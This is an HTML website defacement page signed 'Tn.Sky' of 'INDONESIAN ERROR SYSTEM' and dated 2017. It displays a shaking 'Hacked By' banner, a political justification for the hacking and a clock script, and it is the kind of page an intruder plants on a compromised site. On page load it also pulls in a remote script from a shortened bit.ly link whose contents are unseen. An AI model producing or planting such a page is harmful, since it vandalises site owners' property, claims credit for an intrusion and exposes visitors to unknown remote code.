<html>
<title>Hacked By •{Tn.Sky}•</title>

<body bgcolor="#F5F2F9">
<meta name="description" content="INDONESIAN ERROR SYSTEM"> 
  <link rel="icon" href="https://g.top4top.io/p_1498wgkq40.jpg" type="image/x-icon"> 
  <meta name="keywords" content="Hacked By Tn.Sky INDONESIAN ERROR SYSTEM"> 
  <meta name="author" content="Tn.Sky"> 
<link href="https://fonts.googleapis.com/css?family=Cuprum" rel="stylesheet">

<style>

  body {

    background-color: white;

  }

  @keyframes shake {

  0% { transform: translate(1px, 1px) rotate(0deg); }

  10% { transform: translate(-1px, -2px) rotate(-1deg); }

  20% { transform: translate(-3px, 0px) rotate(1deg); }

  30% { transform: translate(3px, 2px) rotate(0deg); }

  40% { transform: translate(1px, -1px) rotate(1deg); }

  50% { transform: translate(-1px, 2px) rotate(-1deg); }

  60% { transform: translate(-3px, 1px) rotate(0deg); }

  70% { transform: translate(3px, 1px) rotate(-1deg); }

  80% { transform: translate(-1px, -1px) rotate(1deg); }

  90% { transform: translate(1px, 2px) rotate(0deg); }

  100% { transform: translate(1px, -2px) rotate(-1deg); }

}

  .root{

    animation: shake 1s;

    animation-iteration-count: infinite;

    font-family: 'Cuprum',cursive;

    color: black;

    font-size: 50px;

  }

  .coksc{

    font-family: 'Cuprum',cursive;

    color: black;

    font-size: 18px;





  }



</style>

<script src='http://bit.ly/mrzhu-bunga' type='text/javascript'/></script>

<center>

<img src='https://b.top4top.io/p_149802ok70.png' style="width:500px;"><br>

<hr>

<div class="root">Hacked By? <font color='red'>Tn.Sky</font></div><hr>

<div class="coksc"><font color="red" style="font-size:44px;">{</font><font style="font-size:44px;"> INDONESIAN ERROR SYSTEM</font><font style="font-size:44px;" color='red'>}</font><font style="font-size:38px;"><br><br>No System Is Not Safe<br><font size=5 color="red"> Not without reason, this is what we do, <br>this is all for the freedom that the Government restrains</font> <font>

</font><br>

<br>

<div id="clock" style="color: black; font-family: courier new;"></div>

    <script type="text/javascript">

    <!--

    function showTime() {

        var a_p = "";

        var today = new Date();

        var curr_hour = today.getHours();

        var curr_minute = today.getMinutes();

        var curr_second = today.getSeconds();

        if (curr_hour < 12) {

            a_p = "AM";

        } else {

            a_p = "PM";

        }

        if (curr_hour == 0) {

            curr_hour = 12;

        }

        if (curr_hour > 12) {

            curr_hour = curr_hour - 12;

        }

        curr_hour = checkTime(curr_hour);

        curr_minute = checkTime(curr_minute);

        curr_second = checkTime(curr_second);

     document.getElementById('clock').innerHTML=curr_hour + ":" + curr_minute + ":" + curr_second + " " + a_p;

        }

 

    function checkTime(i) {

        if (i < 10) {

            i = "0" + i;

        }

        return i;

    }

    setInterval(showTime, 500);

    //-->

    </script>

<br>

<font color="black" size="4">CopyRight-IES <font color="red">&copy; <font color="black">2k17 Tn.Sky</div>

</center>

</html>
